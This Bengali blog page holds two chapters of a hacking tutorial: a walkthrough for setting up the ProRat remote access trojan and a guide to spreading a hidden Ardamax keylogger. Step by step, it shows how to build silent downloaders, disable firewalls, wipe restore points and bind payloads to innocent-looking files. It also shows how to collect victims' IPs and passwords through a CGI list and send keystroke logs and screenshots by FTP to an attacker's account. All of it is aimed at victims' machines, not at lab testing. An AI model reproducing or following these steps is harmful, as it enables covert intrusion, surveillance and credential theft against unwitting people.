. উপরের ডানের সবুজ বাটনটিতে ক্লিক করুন কানেক্টের জন্য।

প্রোগ্রামটির নির্দিষ্ট কোন অংশ কিভাবে ব্যবহার করতে হয় তা জানার জন্য আপনার মাউসের কার্সরটি যেকোন বাটনের উপর রাখুন (ক্লিক করবেন না) এবং সেখানে একটি সাহায্যকারী বার্তা আপনি দেখতে পাবেন।

UPX Packing একটি স্বয়ংক্রিয় প্রোগ্রাম যা সার্ভারের ফাইল প্যাক করতে ব্যবহৃত হয়।

প্রো-রেট টিউটোরিয়াল :

প্রথমেই এখান থেকে সফটওয়্যারটি ডাউনলোড করে নিন

তাহলে এখন আপনার কাছে প্রো-রেট এর সকল এ্যাপ্লিকেশন রয়েছে। প্রথমে ProRat.exe এ্যাপ্লিকেশনটা ওপেন করুন।  এরপর একেবারে নীচের দিকে Create বাটনে ক্লিক করুন। কয়েকটি অপশন সম্বলিত একটি মেনু ওপেন হবে। সেখান থেকে আমরা প্রো-রেট সার্ভার তৈরী করব। প্রো-রেট সার্ভার এমন একটি সার্ভার যেটার মাধ্যমে আমরা রিমোট কম্‌উনিকেশন করব।

Create ProRat Server এ ক্লিক করলে আপনার সামনে নতুন একটি পর্দা আসবে। সেখানে আপনি বিভিন্ন ধরনের নোটিফিকেশন দেখতে পাবেন। নিচের এদের পরিচিতি দেয়া হল।
প্রো-কানেকশন নোটিফিকেশন :

এটা আপনাকে আইপি এড্রেসের জন্য জিজ্ঞেস করবে। পাশের লাল রংয়ের অর্ধবৃত্তটিকে ক্লিক করলে সেটা আপনাকে একটি এক্সটার্নাল আইপি জেনারেট করে দেবে।
মেইল নোটিফিকেশন :

ভিকটিম যদি আক্রান্ত হয় তাহলে এই সার্ভার আপনাকে মেইল পাঠিয়ে জানিয়ে দেবে।
আইসিকিউ পেজার নোটিফিকেশন :

যদি ভিকটিম আক্রান্ত হয় তাহলে আপনি আইসিকিউ এর মাধ্যমে জানতে পারবেন। সেক্ষেত্রে আপনার ইউজার আইডেন্টিফায়েড নাম্বার দিতে হবে।
সিজিআই নোটিফিকেশন :

এই সংযোগটি হচ্ছে ইন্টারনেটের কোন সার্ভারের সাথে যেটা ভিকটিম আক্রান্তের ফাইল আপলোড করবে।

আপনি যেটা ইচ্ছে সেটাই ব্যবহার করতে পারেন। তবে হ্যাকাররা সাধারনত প্রো-কানেকশন ও মেইল নোটিফিকেশন ব্যবহার করে সর্বাপেক্ষা বেশী।


এবার আমরা যাব General Settings এ।
Server Port :

আপনি যে সার্ভার পোর্ট ব্যবহার করবেন। সাধারনত সেখানে ডিফল্ট হিসেবে ৫১১০ দেয়া থাকে। তবে নিশ্চয়ই আপনি তা ব্যবহার করবেন না।
Server Password :

সার্ভার পাসওয়ার্ড দেয়ার জন্য । যাতে অন্য কেউ তা ব্যবহার করতে না পারে।
Victim Name :

তেমন গুরুত্বপূর্ণ নয়। এটা এই কারনে যে আপনি যাতে এক এক জন ভিকটিমকে এক একটি সার্ভার পাঠাতে পারেন এবং যাতে আপনি সঠিক ভাবে তা মনে রাখতে পারেন।
Give a fake error message :

যখন সার্ভারটি রান হবে তখন একটি এরর মেসেজ দেখানোর জন্য এটি দেয়া হয়। আপনি দিতে চাইলে টিক চিন্হ দিয়ে কনফিগারে ক্লিক করে দিয়ে দিন কি মেসেজ দেখাবে।
Melt Server on Install :

সার্ভার ইন্সটলের পর সার্ভার ইন্সটলারটি ডিলিট হয়ে যাবে।
Disable Windows XP SP2… :

উইন্ডোজ এক্সপির ফায়ারওয়াল নষ্ট করে দেবে।
Clear Windows XP restore point :

এটা এক্সপির রিস্টোর পয়েন্টের সব সিস্টেম নষ্ট করে দেবে যাতে আক্রান্ত পিসি আর রিকোভার করা না যায়।
Dont Send LAN Notifications :

যদি আপনার নেটওয়ার্ক দ্বারা কেউ আক্রান্ত হয় তাহলে এটা সবধরনের নেটওয়ার্ক নোটিফিকেশন বন্ধ করে দেবে। বহিরাগত ল্যান সংযোগের ক্ষেত্রে এটা ব্যাবহৃত হয়।
Invisibility :

এর নিচের চারটি অপশন ব্যবহারকারী থেকে সার্ভার লুকিয়ে রাখতে সাহায্য করে। এর টিকচিন্হগুলো উঠিয়ে দেওয়াই ভালো।

Bind with File : কী-লগারের মতই ফাইল বাইন্ড করতে সহায়তা করে।

Server Extensions : যেকোন একটি সিলেক্ট করুন যেটা আপনি চান।

Icon : যেকোন একটি আইকন বেছে নিন আপনার সার্ভারের জন্য।

তাহলে আপনি সকল সেটিংস সম্পন্ন করেছেন। এবার ডান দিকের একেবারে নীচের দিকে Create Server এ ক্লিক করে কিছুক্ষন অপেক্ষা করুন। সার্ভারটি তৈরী হবে। আপনি যেখানে প্রো-রেট এক্সট্রাক্ট করেছেন সেখানেই আপনি সার্ভারটি দেখতে পাবেন।

এবার প্রো-রেট এর প্রধান উইন্ডোতে চলে আসুন। যদি আপনি প্রো-কানেকশন ব্যবহার করেন তাহরে একেবারে উপরের দিকে Connect ও R এর পাশের চেক বক্সটিতে টিক চিন্হ দিয়ে দিন।

এখন IP address বক্সে ভিকটিমের আইপি দিন এবং পোর্ট দিন যে পোর্টে সার্ভারটি রান হবে। সবশেষে Connect বাটনে ক্লিক করুন। আপনি হয়ত আপনার প্রদত্ত পাসওয়ার্ড দিতে হতে পারে।

এখন আমরা এর মাধ্যমে পথচলা আরম্ভ করব। এখন আমরা আমাদের খেলনা নিয়ে খেলা করব। আপনি যদি আপনার নিজের পিসিতে পরীক্ষা চালাতে চান তাহলে কি কি করা উচিত নয় সেগুলো বলছি-

চ্যাট : কখনই পরীক্ষা চলাকালে কারো সাথে চ্যাটিং করার চেষ্টা করবেন না।

মনিটর বন্ধ করা : পরীক্ষা চলাকালে কখনই মনিটর বন্ধ করবেন না। তাহলে আপনি কিভাবে বুঝবেন যে আপনি কি করছেন…………….lolz

স্ক্রীন-সেভার : স্ক্রীন সেভার বন্ধ রাখুন।

এবার অন্য সার্ভার পরিচিতি :
Downloader Server :

ডাউনলোডার সার্ভারের মূর কাজ হচ্ছে এটা ভিকটিমকে একটি সহজতর উপায়ে আক্রান্ত করে। প্রো-রেট সার্ভার হচ্ছে ৩৫০ কিলোবাইট কিন্তু ডাউনলোডার সার্ভার হচ্ছে শুধুমাত্র ২ কিলোবাইট। তাই এটা আপনার ভিকটিমকে পাঠানো অনেক সহজ।

ডাউনলোডার সার্ভারের কাজ হচ্ছে ডাউনলোড এবং টার্গেট পিসির সার্ভারে রান করা। এটা মূল সার্ভারে সবচেযে দ্রুততর উপায়ে ডাউনলোড করে এবং ভিকটিমকে কোনরূপ নোটিফিকেশন দেয়া ছাড়াই এক্সিকিউট করে। যখন ডাউনলোডার সার্ভার কোন ফাইলের সাথে বাইন্ডেড থাকে, তখন সেই ফাইলটির সাইজ কখনই বড় হওয়া উচিত নয়। যদি আপনি ডাউনলোডার সার্ভার ব্যবহার করতে চান তাহলে আপনার ওয়েব হোস্টিং থাকতে হবে। আপনি ইচ্ছে করলে ফ্রি হোস্টিং ব্যবহার করতে পারেন।এরপর আপনাকে একটি সাধারন সার্ভার বানাতে হবে এবং তা ঐ ওয়েব হোস্টিংয়ে আপলোড করতে হবে।

মনে করি আপনার একটি সার্ভার রয়েছে http://www.example.com/yourarea/ তে। এখন যদি আপনি সেখানে আপনার তৈরী প্রো-রেট সার্ভারটি আপলোড করেন তাহলে এর এড্রেস হবে অনেকটা http://www.example.com/yourarea/server.exe

এখন আপনাকে একটি ডাউনলোডার সার্ভার তৈরী করতে হবে।

ডাউনলোডার সার্ভার তৈরী করার উপায় :

প্রথমেই প্রো-রেট এর Create এ ক্লিক করুন। তারপর Create downloader Server বাটনে ক্লিক করুন। এখন আপনার সামনে একটি নতুন উইন্ডো খুলবে।

যখন আপনি ডাউনলোডার সার্ভারে URL টাইপ করবেন তখন এটা স্বয়ংক্রিয়ভাবে সেভ হবে যাতে করে পরবর্তীতে নতুন ডাউনলোডার সার্ভার তৈরী করার ক্ষেত্রে আপনার সময় বাচাবে।

এবার আপনি এই পন্হাটি অনুসরন করুন :
১। URL :

এই ডাউনলোডার সার্ভার মেনুতে আপনি ডাউনলোড লিংক দিবেন যেটা আপনার টার্গেট পিসিতে ডাউনলোড হবে। যেমন : http://example.com/yourarea/server.exe
২। Bind with a file :

আপনি ইচ্ছে করলে সার্ভার/ডাউনলোডার সার্ভারটি কোন ফাইলের সাথে বেধে দিতে পারেন। তাহলে অবশ্যই আপনাকে Bind the server with a file বাটনে ক্লিক করতে হবে এবং বাটনটি কাযর্করী থাকতে হবে। আপনি কোন ফাইল পছন্দ করে সার্ভারের সাথে যুক্ত করে দিতে পারেন। ফাইলটির এক্সটেনশন কি-সেটা গুরুত্বপূর্ন নয় বরং সাইজটি গুরুত্বপূর্ণ। আপনি সার্ভারটির সাইজ দেখতে পাবেন Server Size অংশে ক্লিক করার মাধ্যমে।
৩। Server Extensiton :

আপনি সার্ভার/ডাউনলোডার সার্ভারটির এক্সটেনশন পছন্দ করতে পারেন। সাধারনত প্রো-রেট পাচটি এক্সটেনশন সার্পোট করে। যেমন : .exe, .scr, .pif, .com, .bat

কিন্তু তাদের মধ্যে দুটি আইকন সাপোর্ট করে। অন্যগুলো উইন্ডোজের আইকন সাপোর্ট করে না। তাই .exe এবং .scr দুটি আপনি এক্সটেনশন হিসাবে বেছে নিতে পারেন।
৪। Server Icon :

যদি আপনি উপরোক্ত দুটির যেকোন একটি এক্সটেনশন বেছে নেন তাহলে এখন আপনার কাজ হচ্ছে একটি আইকন বেছে নেয়া। মনে রাখবেন সার্ভারের মূল সাইজ বেড়ে যাবে যখন আপনি একটি আইকন যোগ করবেন। যদি আপনি আইকন ব্যবহার করতে চান তাহলে server icon এ ক্লিক করুন এবং তারপর এখান থেকে যেকোন আইকন বেছে নিন।

যদি আপনি সব সেটিংস করতে পারেন তাহলে বুঝতে হবে আপনি ডাউনলোডার সার্ভার তৈরী করে ফেলেছেন। এখন আপনি শুধু ক্লিক করবেন Create Server বাটনে।

যখন আপনি আপনার ডাউনলোডার সার্ভার তৈরী করবেন তখন আপনি এর নাম পরিবর্তন করতে পারেন। এটা স্বয়ংক্রিয়ভাবে টার্গেট পিসির সার্ভারে রান হবে তাও আবার অদৃশ্যভাবে…..lol

যতক্ষননা পযর্ন্ত মূল সার্ভার পিসিতে ডাউনলোড হচ্ছে ততক্ষন পযর্ন্ত ডাউনলোডার সার্ভার স্বয়ংক্রিয়ভাবে রিস্টার্ট হতে থাকে।

সাবধানতা : সার্ভার থেকে ডাউনলোডার সার্ভার ডাউনলোডের সময় যদি আপনার টার্গেটকৃত পিসি ডিসকানেক্টেড হয়ে যায়, তাহলে তা আর রিজিউম হবে না, শুধুমাত্র এটা পুনরায় ঐ পিসিতে রিস্টার্ট হবে।
CGI ভিকটিম লিস্ট :

আমরা সিজিআই এর কাজ সম্পর্কে আগেই জেনেছি। এখন জানব আরো বিস্তারিত।
ভিকটিম লিস্ট কি?

ভিকটিম লিস্ট হচ্ছে একটি সিস্টেম যেটি আপনাকে ইমেইল বা আইসিকিউ নোটিফিকেশন এর মত সার্ভার থেকে যে তথ্য পাঠানো হয়েছে তা দেখাবে। সিজিআই লিস্টের মাধ্যমে যা পাঠানো হবে সেখানে থাকবে ভিকটিমের আইপি এড্রেস, পোর্ট নাম্বার, পাসওয়ার্ড ইত্যাদি।

ভিকটিম লিস্ট তৈরী করন :

অন্যান্য ট্রোজান সিজিআই নোটিফিকেশন এর সাথে এই সিজিআই এর বিশাল পার্থক্য রয়েছে। প্রো-রেট সিজিআই হচ্ছে তার ক্লায়েন্টের জন্য সর্বাপেক্ষা সেরা সিজিআই ভিকটিম লিস্ট ক্রিয়েটর।আপনি আপনার ইচ্ছেমত সবকিছু তৈরী করতে পারবেন এখানে। অন্যান্য সিজিআই ভিকটিম লিস্ট তৈরী করা কালে আপনাকে কোড লিখতে হয়, কিন্তু এখানে তাও করতে হয় না, এতে করে আপনার প্রচুর সময় বেচে যায়। এছাড়াও আপনি এখানে আপনার পছন্দনীয ভাষাও নির্বাচন করতে পারবেন।

যদি আপনি ভিকটিম লিস্ট তৈরী করতে চান আপনাকে অবশ্যই Create বাটনে ক্লিক করতে হবে। তখন একটি অতিরিক্ত মেনু খুলবে, Create CGI victim list বাটনে ক্লিক করুন এবং আপনি সেখানে ৪টি বক্স ও Create cgi files বাটন দেখতে পাবেন। যে ফিচারগুলো সেখানে অন্তর্ভূক্ত করা হয়েছে সেগুলো হল :

Victim List Password :

যদি আপনি আপনার লিস্টটি পাসওয়ার্ড দ্বারা সংরক্ষিত করতে চান তাহলে আপনাকে সেকানে পাসওয়ার্ড দিতে হবে।

CGI Script Name :

তুর্কি কারেক্টার ছাড়া আপনি যেকোন স্ক্রিপ্ট নাম পছন্দ করতে পারেন। যদি আপনি সিজিআই লিস্টের নাম পরিবর্তন করতে চান তাহলে মনে রাখবেন আপনার তৈরীকৃত সিজিআই ভিকটিম লিস্ট কাজ করবে না। যখন ফাইলটি তৈরী করবেন শুধুমাত্র তখনই নাম পরিবর্তন করে দিন। সিজিআই ফাইলটির ডিফল্ট নাম হবে prorate.cgi

CGI Script Data :

আবার বলছি আপনি যেকোন স্ক্রিপ্ট নাম পছন্দ করতে পারেন যেটিতে তুর্কি কারেক্টার নেই। যদি আপনি .dat এক্সটেনশনের ফাইলটির নাম পরিবর্তন করেন তাহলে সেটি কাজ করবে না। এক্ষেত্রে আপনি যখন ফাইলটি তৈরী করবেন তখনই পরিবর্তন করে নিবেন। এক্ষেত্রে ডিফল্ট নাম থাকবে log.dat এক্ষেত্রে স্ক্রিপ্টটি সার্ভার থেকে আগত তথ্যগুলোকে লগ ফাইল আকারে সংরক্ষন করে রাখবে।

Max Number for List :

এই মেনুটি আপনার সম্পূর্ণ ভিকটিম লিস্ট দেখাবে। সেখানে ডিফল্ট নাম্বার থাকে ১০০. ডিফল্ট রাখাই ভালো। তবে আপনি যদি বাড়িয়ে দেন যেমন : ১০০০০ তাহলে প্রক্রিয়াটির কাজ করার গতি কমে যাবে। সবগুলো সেটআপ করার শেষে আপনি Create CGI files এ ক্লিক করুন।
ব্যবহার বিধি :

যদি আপনি সিজিআই ভিকটিম লিস্ট টুলটি ব্যবহার করতে চান তাহলে সিজিআই সাপোর্ট দেয় এমন একটি ওয়েবহোস্টিং সার্ভিসে আপনার একাউন্ট থাকতে হবে। আপনি নিম্নোক্ত দুটি সাইটে বিনামূল্যে হোস্ট সেবা নিতে পারেন।


http://www.netfirms.com

http://www.tripod.lycos.com

এবার রেজিষ্ট্রেশন করার পর আপনাকে prorate.cgi এবং log.dat ফাইল দুটিকে আপনার হোস্টের cgi-bin ফোল্ডারে ASCII মুডে আপলোড করতে হবে। prorate.cgi এর CHMOD পরিবর্তন করে দিন ৭৫৫ তে এবং log.dat এর ক্ষেত্রে ৬০০ তে।
ইন্সটল + গুরুত্বপূর্ন বিষয় + কিছু সাধারন প্রশ্ন :

১। প্রথমে জানুন যে আপনার হোস্টিং সিজিআই সাপোর্ট করে কিনা। যদি তা না করে তাহলে আপনি অন্য হোস্টিং বেছে নিন যেখানে সিজিআই সাপোর্ট করে।

২। আপনার হোস্টের cgi-bin ফোল্ডারে ফাইল আপলোড করুন এবং আপলোডের পর ফাইলদুটি চেক করুন। আপনি সিজিআই ডাইরেক্টরীতে দুটি ফাইল দেখতে পাবেন।

৩। আপনাকে অবশ্যই ASCII মুডে ফাইল দুটি আপলোড করতে হবে।যদি আপনি বাইনারী মুডে আপলোড করেন তাহলে আপনার সিজিআই ভিকটিম লিস্টটি কাজ করবে না। যদি আপনি এই সমস্যাটির সমাধান করতে চান তাহলে আপনি Cute FTP সফটওয়্যারটি ব্যবহার করতে পারেন। গুগলে সার্চ দিলেই আপনি সফটওয়্যারটি পেয়ে যাবেন। এই প্রোগ্রামটি স্বয়ংক্রিয়ভাবে ফাইলের এক্সটেনশন অনুযায়ী মুড পরিবর্তন করতে পারে। যদি আপনি আরও বিস্তারিত জানতে চান তাহলে গুগলে সার্চ দিন : upload + ASCII + cgi

৪। আপনি কি হোস্টে CHMOD সেটাপ করেছেন?

Prorate.cgi এবং log.dat এর CHMOD ভ্যালু হচ্ছে যথাক্রমে ৭৫৫ এবং ৬০০।

আপনি কিউট-এফটিপি দিয়ে ফাইলদুটি আপলোডের পর CHMOD এ্যাডজাস্ট করতে পারেন। ফাইলে ডান ক্লিক করুন তারপর CHMOD এ ক্লিক করে নিচের প্রক্রিয়া অনুসরন করুন।

prorat.cgi :

Owner permissions :

[X]READ [X]WR?TE [X]EXECUTE

Group permissions :

[X]READ [ ]WR?TE [X]EXECUTE

Public permisions :

[X]READ [ ]WR?TE [X]EXECUTE

log.dat :

Owner permissions :

[X]READ [X]WR?TE [ ]EXECUTE

Group permissions :

[ ]READ [ ]WR?TE [ ]EXECUTE

Public permisions :

[ ]READ [ ]WR?TE [ ]EXECUTE

৫। যদি আপনি এখন বলেন যে, যা বলা হয়েছে সব-ই করেছি কিন্তু এখনই কোন কাজ হচ্ছে না :

আপনি কি আপনার prorate.cgi ফাইলটি তৈরীর পর পরিবর্তন করেছিলেন? যদি আপনি পরিবর্তন করে থাকেন তাহলে তা কাজ করবে না। সেক্ষেত্রে আপনাকে নতুন সিজিআই তৈরী করতে হবে।

৬। যদি আপনি বলেন, আমি আমার পাসওয়ার্ড সিজিআই ভিকটিম লিস্টে দিয়েছি কিন্তু আমার লিস্টটি ওপেন হচ্ছে না :

এক্ষেত্রে আমার মনে হচ্ছে আপনি সিজিআই ফাইলটির নাম পরিবর্তন করেছিলেন এবং সেই কারনেই এই সমস্যাটির উদ্ভব হয়েছে।

মনে রাখবেন যদি আপনার একান্তই নাম পরিবর্তন করার ইচ্ছে থাকে তাহলে ক্লায়েন্টের মাধ্যমে ফাইল তৈরীর সময়ই নাম পরিবর্তন করে দিবেন। কিন্তু যদি আপনি একজন এ্যাডভান্সড ইউজার হোন তাহলে আপনি prorate.cgi টিকে নোটপ্যাডে খুলে প্রয়োজনীয় এডিটিং সম্পন্ন করতে পারেন।

৭। যদিও আপনি আপনার ভিকটিম লিস্টে সঠিক URL বসিয়েছেন তথাপি এটি বলছে “*****named file cannot be found”.

যদি আপনি এ ধরনের সমস্যায় পড়েন তাহলে হয়ত আপনি log.dat ফাইলটি cgi-bin ফোল্ডারে আপলোড করতে ভুলে গেছেন অথবা আপনি log.dat ফাইলটির নাম পরিবর্তন করেছেন।

৮। আপনি যেই পাসওয়ার্ডটি আপনার ভিকটিম লিস্ট পাসওয়ার্ডে দিয়েছেন সেটি বুলে গিয়ে থাকলে নতুন একটি তৈরী করতে হবে। সেক্ষেত্রে পুরোনো prorate.cgi এর স্থলে নতুনটি বসিযে দিতে হবে।

৯। যদি আপনার অনেকগুলো ভিকটিম থাকে কিন্তু তারা আপনার ভিকটিম লিস্টে অন্তর্ভূক্ত হয়নি তাহলে?

সেক্ষেত্রে prorate.cgi ফাইলটি টেক্সট এডিটরে খুলুন এবং সেটিংস অংশে দেখুন লেখা রয়েছে: $show_list = “xxx”; এখানের xxx অংশে আপনি ডিফল্ট ভ্যালু ১০০ সেট করুন। সেভ করুন। সবশেষে এটি পুরাতনটির জায়গায় আপলোড করুন।

১০। যদি আপনি বলেন যে, আমি সবকিছুই করেছি কিন্তু আমি জানি না কি করে আমার ভিকটিম লিস্ট সংযোগ করতে হয়। তাহলে আপনি আপনার ব্রাউজারের এড্রেস বারে টাইপ করুন http://example/cgi-bin/prorat.cgi

এরপর সেখানে আপনি একটি লগইন পেজ দেখতে পাবেন। এখানে গুরুত্বপূর্ণ বিষয় হচ্ছে আপনার সিজিআই ফাইলটির নাম কি? উদাহরনস্বরূপ আপনার একাউন্টের নাম যদি এরকম হয় যে, http://prorat.yoursite.com এবং ফাইলটির নাম যদি হয় haxor.cgi তাহলে লিখতে হবে http://prorat.yoursite.com/cgi-bin/haxor.cgi

১১। আপনি বলছেন যে, আমি ট্রাইপড হোস্টে ফাইলদুটি আপলোড করেছেন কিন্তু এটি ম্যানুয়্যালি CHMOD টি এডিট করতে দিচ্ছেনা তাহলে?

এটি অবশ্যই কিছু হোস্টের ক্ষেত্রে সত্য কিন্তু আপনি নিম্নোক্ত পন্থাতে এটি এডিট করতে পারেন :

আপনার ট্রাইপড পেজে লগইন করুন এবং ফাইল ম্যানেজারে প্রবেশ করুন। আপনার ফাইলদুটি আপনি আপনি cgi-bin ফোল্ডারে দেখতে পাবেন। সেক্ষেত্রে prorate.cgi পাশের চেকবক্সে টিক চিন্হ দিয়ে একেবারে উপরে বামে এডিট বাটনে ক্লিক করুন। এখন prorate.cgi এর সবকিছু ডিলিট করে দিন এবং আপনার পিসিতে যে ফাইলটি রয়েছে সেটির কন্টেন্টগুলো কপি করে এখানে পেস্ট করে সেভ করুন।

১২। আপনি সবকিছুই করেছেন কিন্তু log.dat ফাইলটি আপলোড করতে পারছেন না?

তাহলে আপনি log.dat ফাইলে কিছু টাইপ করুন তারপর পুনরায় সেন্ড করুন। ভিকটিম লিস্টটি ইন্সটলের পর আপনি সকল লগ ডিলিট করতে পারেন Empty Page বাটনটি ক্লিক করার মাধ্যমে।

১৩। আপনি সিজিআই সাপোর্ট করে এমন একটি হোস্টে একাউন্ট করেছেন কিন্তু সেটি আপনার একাউন্ট ক্লোজ করে দিয়েছে :

যদি আপনার অনেকগুলো ভিকটিম থাকে তাহলে এত ট্রাফিক ঐ কোম্পানীর এডমিনকে এ্যালার্ট করতে পারে অথবা আপনি শুধুমাত্র cgi-bin ফোল্ডারটি আপনার একাউন্টে ব্যবহার করছেন, এটিও তাদের এলার্ট করতে পারে। এখন আপনি নতুন একটি একাউন্ট খুলুন এবং সেখানে দুতিনটি ফোল্ডার রাখুন। যেমন: index এবং এগুলো কোন সাইটে লিংক করে দিন ঠিক যেমনটি আমরা ওয়েবসাইট তৈরীর ক্ষেত্রে করে থাকি।

১৪। যদি এখনও আপনি বলেন যে আমি সবকিছুই করেছি কিন্তু কিছুই হচ্ছে না-

তাহলে বলতে হয় আপনার বয়স যদি ১৮ র কম হয় তাহলে এসব বন্ধ করে গেম খেলা শুরু করুন। আর যদি ১৮ র বেশি হয় তাহলে হ্যাকিং বাদ দিয়ে গান শুনুন……lolz

প্রিয় বন্ধুরা, এই বাংলা ব্লগ-এ আপনারা পড়ছেন অধ্যায়: ১৬ রেটস (সার্ভার পিসি হ্যাক করার উপায়) আপডেটেড

অধ্যায়: ১৫ কী-লগার দিয়ে যে-কারও কম্পিউটার হ্যাক করুন




ধাপ-১ কী-লগার সেটাপ করা
প্রথমেই আমরা আমাদের কম্পিউটারে আর্ডামেক্স কী-লগার সফটওয়্যারটি ইন্সটল করব। এটি ডাউনলোডের জন্য এখানে ক্লিক করুন। 

পাসওয়ার্ড : এখানে

ডাউনলোডের পর ইন্সটল করে নিন। এর ইন্সটল প্রক্রিয়া অন্য সকল সফটওয়্যারের মতই। যখন আপনি ইন্সটল করা শেষ করবেন তখন লক্ষ্য করবেন আপনার সিস্টেম ট্রে-তে একটি নোটপ্যাড আইকনের মত কি যেন দেখা যাচ্ছে। আসলে এটিই আর্ডাম্যাক্স কী-লগার। চিন্হটিতে মাউসের ডান বাটনে ক্লিক করে Enter Registration Key তে ক্লিক করুন।
এবার আপনি আর্ডামেক্সের যে প্যাকেজটি ডাউনলোড করেছেন সেখানে দেখুন সিরিয়াল কী দেয়া আছে। নাম ও রেজিষ্ট্রেশন কী বসিয়ে ওকে করুন। ব্যাস হয়ে গেল কী-লগার সেটাপ।
 
ধাপ-২ কী-লগার ইঞ্জিন তৈরী করা
এখন আমার কী-লগার ইঞ্জিন তৈরী করব যেটা এমএসএন বা বিভিন্ন মাধ্যম দিয়ে শিকারের নিকট পাঠিয়ে দেব। এবার আপনি সিস্টেম ট্রেতে সেই নোটপ্যাড চিন্হিত স্থানে মাউসের ডান বাটনে ক্লিক করে দেখুন লিখা রয়েছে Remote Installation.
সেখানে ক্লিক করুন। এবার নেক্সট চাপুন। Appearance দেখতে পাবেন। এবার Additional Components এর অন্তগর্ত Log viewer এর টিক চিন্হ উঠিয়ে দিয়ে নেক্সট চাপুন।
এখন যে পর্দাটি দেখতে পাবেন সেখানের সবগুলো টিক চিন্হ দেয়া আছে কিনা তা নিশ্চিত করুন। কারন এটা গুরুত্বপূর্ন।
এবার নেক্সট এ চেপে Enable এ ক্লিক করুন। যেকোন পাসওয়ার্ড দিন। তারপর দেখুন সবগুলো টিক চিন্হ দেয়া আছে কিনা? এবার নেক্সট চাপুন। আপডেট করতে চাইলে টিক চিন্হ দিন না হলে উঠিয়ে আবার নেক্সট চাপুন।
এখন আপনি অপশনে চলে এসেছেন। এটা সম্পূর্ণ আপনার উপর নির্ভর করে। যদি আপনি কী-লগার টিকে হিডেন রাখতে চান অর্থাৎ কেউ জানবে না যে আপনি হ্যাকিং করছেন তাহলে Start in Hidden Mode এ টিক চিন্হ দিয়ে নেক্সট চাপুন।
মনে রাখবেন যখনই আপনি নতুন কী-লগার ইঞ্জিন তৈরী করতে যাবেন তখনই কী-বোর্ড থেকে (কন্ট্রোল+সিফ্ট+অল্টার+H) চাপতে হবে।
যাই হোক আপনি এখন রয়েছেন কন্ট্রোলে। এখানে অনেকগুলো কাজ রয়েছে।
Send Log Every ৩০ মিনিট নির্বাচন করুন।
Delivery Method এ FTP তে টিক দিন।
Send only if log size exceeds এর টিক উঠিয়ে দিন।
এবার নেক্সট চাপুন। এবার আপনি রয়েছেন FTP তে, তাই না?
তাহলে এখন আমাদের http://drivehq.com তে একটি একাউন্ট খুলতে হবে।
এবার wwwhome এ ক্লিক করুন। তারপর সেখানে Logs নামে একটি ফোল্ডার তৈরী করুন। এখানেই আপনি কাউকে কী-লগ করলে সেই তথ্য এসে জমা হবে।
এবার আপনার কী-লগার সেটিংসে যেখানে FTP Host লেখা রয়েছে সেখানে লিখুন http://ftp.drivehq.com/
Remote Folder এ লিখুন Logs
এবার যেখানে Username ও Password দেখায় সেখানে আপনার DriveHQ এর ইউজার ও পাসওয়ার্ড বসিয়ে দিন। এবার নেক্সট চাপুন।
কখনও আপনি আপনার DriveHQ এর ইউজার ও পাসওয়ার্ড পরিবর্তন করবেন না বা Logs ফোল্ডারটি ডিলিট করবেন না। এ কথাটি মনে রাখবেন।
এবার যে পর্দাটি আপনার সামনে আসবে দেখুন সেকানে সবগুলো ঘরে টিক দেয়া আছে কিনা। না থাকলে টিক দিয়ে নেক্সট চাপুন। এবার দেখতে পাবেন Screen Shots সেটিংস। এটা নিচের চিত্রের মত করে নেক্সট চাপুন। ইচ্ছে করলে আপনি সময়ের কম-বেশি করতে পারেন।
এবার আপনার সামনে ডেস্টিনেশান পাথ আসবে। অর্থাৎ কোথায় রাখবেন ইঞ্জিনটি। আমি আপনাকে My Documents এ রাখতে বলব। আপনি অন্য যেকোন স্থানে রাখতে পারেন। এবার Open the folder…… টিক চিন্হ উঠিয়ে দিন। এটা আপনার নিজেকে নিজের লগ থেকে মুক্তি দেবে। নিচের আইকন পরিবর্তন করতে পারেন। নেক্সট চাপুন। সবশেষে Finish চাপুন।
 
ধাপ-৩ কী-লগারকে অন্য ফাইলের সাথে বেধে দেয়া
প্রথমে এখান থেকে সফটওয়্যারটি ডাউনলোড করে নিন।
এরপর আপনি সফটওয়্যারটি ডেস্কটপে এক্সট্রাক্ট করে Easy Binder এ ক্লিক করুন।
সফটওয়্যারটি খোলার পর লক্ষ্য করুন এর নিচের দিকে বাম দিকে একটি + চিন্হিত সবুজ বাটন রয়েছে। সেখানে ক্লিক করুন। এবার সেখান থেকে আপনার My Documents এ থাকা কী-লগার ইঞ্জিনটি এ্যাড করুন। ঠিক একইভাবে আপনি আরেকটি ফাইল এ্যাড করুন হতে পারে সেটি কোন পিকচার।
এখন আপনার প্রয়োজন হবে একটি আইকন ফাইল তৈরী করা। আইকন ফাইল তৈরী করার জন্য এই পোষ্টটি দেখুন। আপনি নিশ্চয়ই এতক্ষনে আইকন ফাইল তৈরী করে ফেলেছেন।
এবার Binder এর Settings এ যান এবং দেখুন সেখানে লিখা রয়েছে Select an Icon আপনার আইকনটির পাথ দেখিযে দিন।
সবশেষে Bind Files এ ক্লিক করুন। ব্যাস হয়ে গেল।
 
ধাপ-৪ HTML এর মাধ্যমে প্রচার করা
এবার আপনি এটাকে কোন ওয়েবসাইটে আপলোড করুন। এর রুট নাম পরিবর্তন করে দিন। যেমন : index.html , download.html, image.html ইত্যাদি। এবার এটাকে রিনেম করে আপনার শিকারের কাছে পাঠিয়ে দিন। যথন কেউ ওই ওয়েবসাইট ব্রাউজ করবে তখনই সে আপনার তৈরী ট্রোজান দ্বারা আক্রান্ত হবে।


প্রিয় বন্ধুরা, এই বাংলা ব্লগ-এ আপনারা পড়ছেন অধ্যায়: ১৫ কী-লগার দিয়ে যে-কারও কম্পিউটার হ্যাক করুন

ব্লগটির স্পন্সর



ই-মেইলে স্বয়ংক্রিয়ভাবে নতুন পোষ্ট পেতে চাইলে

ই-মেইল সাবস্ক্রিপশন

Enter your email address:

Delivered by FeedBurner

ক্যাটাগরীসমূহ

চ্যাটরুম


Try Relay: the free SMS and picture text app for iPhone.

জনপ্রিয় পোষ্টসমূহ

ব্লগটি মোট পড়া হয়েছে

বাঙলা ব্লগ. Powered by Blogger.

- Copyright © মেহেদী হাসান-এর বাঙলা ব্লগ | আমার স্বাধীনতা -Metrominimalist- Powered by Blogger - Designed by Mahedi Hasan -

Related Posts Plugin for WordPress, Blogger...